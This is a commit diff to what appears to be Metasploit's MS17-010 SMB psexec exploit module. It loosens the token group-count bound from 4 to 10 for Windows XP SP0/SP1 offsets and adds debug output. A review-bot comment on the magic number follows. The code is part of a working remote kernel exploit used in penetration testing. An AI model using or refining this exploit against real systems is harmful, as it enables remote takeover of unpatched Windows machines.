more trace and more flexible tolerance for SP0/SP1

MS-2855/keylogger-mettle-extension
zerosum0x0 2018-01-29 19:57:43 -07:00
parent 7007bc1444
commit bbeccdd024
1 changed files with 11 additions and 3 deletions


@ -122,11 +122,15 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
@ctx['tokenData'] = tokenData
@ctx['tokenAddr'] = tokenAddr
if datastore['DBGTRACE']
print_status("TOKEN data = #{bin_to_hex(tokenData)}")
end
userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0] #unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0] #unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
if @ctx['os'] == 'WINXP' and @ctx['arch'] == 'x86'
if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
if userAndGroupCount > 10 or userAndGroupCount == 0 # check NULL too
print_error("Bad TOKEN offsets detected (group count = #{userAndGroupCount}), performing workaround...")
@ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
@ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
@ -134,9 +138,13 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0]
userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0]
if datastore['DBGTRACE']
print_status("New TOKEN offsets (group count = #{userAndGroupCount})")
end
# hopefully its not bad anymore
if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
raise MS17_010_Error, 'Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD'
if userAndGroupCount > 10 or userAndGroupCount == 0 # check NULL too
raise MS17_010_Error, "Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD"
end
end
end
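Review bot: The new bound of 10 is now a magic number repeated in both checks (the one that triggers the SP0/SP1 offset workaround and the one after it that raises before the BSOD), so a later tolerance tweak applied to only one of them would make the abort guard disagree with the trigger. Hoist it once, e.g. `max_groups = 10 # SP0/SP1 tokens carry more groups than the original limit of 4 allowed`, and use `if userAndGroupCount > max_groups or userAndGroupCount == 0` in both places. Only the group count is sanity-checked; userAndGroupsAddr, unpacked from the same token bytes, is not validated here, though whether it is dereferenced downstream is not visible in this hunk. The whole bounds check also runs only for the WINXP/x86 branch, so other targets proceed with an unchecked count — a short comment on why that is acceptable would help the next reader. The enclosing method begins before this hunk.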